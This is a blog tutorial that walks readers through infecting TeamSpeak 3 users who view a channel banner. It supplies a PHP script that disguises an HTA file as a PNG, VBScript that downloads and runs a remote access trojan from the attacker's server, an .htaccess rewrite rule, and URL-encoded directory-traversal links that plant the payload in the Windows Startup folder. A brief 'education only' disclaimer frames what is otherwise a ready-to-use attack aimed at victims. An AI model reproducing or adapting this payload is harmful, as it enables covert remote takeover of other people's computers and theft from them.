Please do understand that this is for education purpose only. I won't be held responsible for anything illegal you do using this tutorial. Anyway I haven't written a tutorial on here in quite some time so I may be a little rusty but hopefully it'll be easy to read and easy on the eyes! In this guide I'm going to be showing you how to infect someone by only having them join a TeamSpeak 3 server. This has been patched now, however there has only been one patch since this exploit was discovered so many people may still be running this version of TeamSpeak 3.
This exploit exploits the way that TeamSpeak shows channel images such as banners to the user. It downloads them into cache. With this we can exploit it. So if you're interested, read on! If you are lazy then feel free to watch the video guide by scrolling down.
Disclaimer
I'd like to make it perfectly clear that I did not discover this exploit, but a user named Scurippio and you can read his full exploit report over on Exploit-DB. All I have done is adapted the VBScript to download a RAT Server and execute it. And I guess I can take credit for both this written guide and the video guide. Now with that been said, lets move onto the tools we're going to need.
Tools Required
There are a couple of tools we are going to need to do this exploit, but they are easy to acquire.
- Webserver (With .htaccess and FTP Support)
- Darkcomet (Or RAT of your choice) Download here | Setup video here
- TeamSpeak 3 3.0.18.1 (The victim needs this version and can be downloaded from here
- Teamspeak 3 server which you can buy or download from here or if you're already an admin/have permissions to edit channel banners then you're all set!
Guide
Okay. Let me explain how this exploit works. When a channel banner is set in a TeamSpeak server with the [img] bbcode tags it will check the URL and download the image into cache. However the first vulnerability here is that TeamSpeak does not properly check URLS to make sure they are a picture and we can fake extensions such as .hta, .src and .msi. TeamSpeak only checks to see if it's a picture by checking the header, which we can easily overcome by making a .php script with:
<?phpheader ('Content-type: image/png');echo "\211PNG\r\n\032\n";?>
This will trick TeamSpeak into thinking it's a picture, thus running the URL. Because TeamSpeak 'runs' code when it downloads a picture we can create a simple PHP script that creates a .HTA file.
<?phpheader ('Content-type: image/png');echo "\211PNG\r\n\032\n";?><html><head><title>PWN3D</title><HTA:APPLICATIONAPPLICATIONNAME="TeamSpeak3 Vul"ID="PwnSpeak"VERSION="1.0"/><script language="VBScript">Set oShell = CreateObject("Wscript.Shell")strUserProfile = oShell.ExpandEnvironmentStrings("%USERPROFILE%\update.exe")dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")dim bStrm: Set bStrm = createobject("Adodb.Stream")xHttp.Open "GET", "<LINK TO YOUR RAT SERVER>", FalsexHttp.Sendwith bStrm.type = 1 '//binary.open.write xHttp.responseBody.savetofile strUserProfile, 2 '//overwrite0end withSet WshShell = CreateObject("WScript.Shell")WshShell.Run strUserProfile</script></head></html>
So what this PHP Script does is create a .HTA file that when run will a VBScript that downloads our RAT Server and executes it. I RAT Server is saved in the userprofile called "update.exe" so make sure that your RAT Server automatically deletes itself when executed.
Now we have our PHP Script that needs to be uploaded to a webserver, we also need to edit our .htaaccess file so that it automatically redirects the webservers domain name to our PHP File, so add this Rewrite Engine into your .htaccess file.
RewriteEngine OnRewriteCond %{REQUEST_URI} !/ts3.phpRewriteRule .* /ts3.php
Make sure your PHP File is named "ts3.php" or simply rename the Rewrite engine in your htaccess file.
Okay, so our PHP Script is on our webserver and when we go to our domain it doesn't display anything. Now our browser won't execute this .HTA script so don't worry about infecting yourself. We now are ready to exploit the vulnerability.
Whenever TS3 downloads an image it stores it in
"%userprofile%\AppData\Roaming\TS3Client\cache\remote\www.domain.com\"
Now with some clever HTTP Exploit called "Directory Traversal" we can make TeamSpeak download our .hta file somewhere else... For example... The startup folder.
Using URL Encoding we can easily do this.
This is what the URL will look like without URLEncoding:
http://domain.com/..\..\..\..\..\..\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pwnspeak.hta
Now using url-encoding:
http://domain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cpwnspeak.hta
Or
http://domain.com/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cRoaming%5cMicrosoft%5cWindows%5cStart%20Menu%5cPrograms%5cStartup%5cpwnspeak.hta
Now we have our malicious link we can add this to [img] tags in our channel description!
With that there, whenever someone clicks on the channel it will download our pwnspeak.hta file into the startup folder and then on the next restart it will execute our VBScript and infect the victim with our RAT Server.
Do you like this post? Please link back to this article by copying one of the codes below.
URL: HTML link code: BB (forum) link code:Last Modified: 17 December, 2015
0 comments:
Post a Comment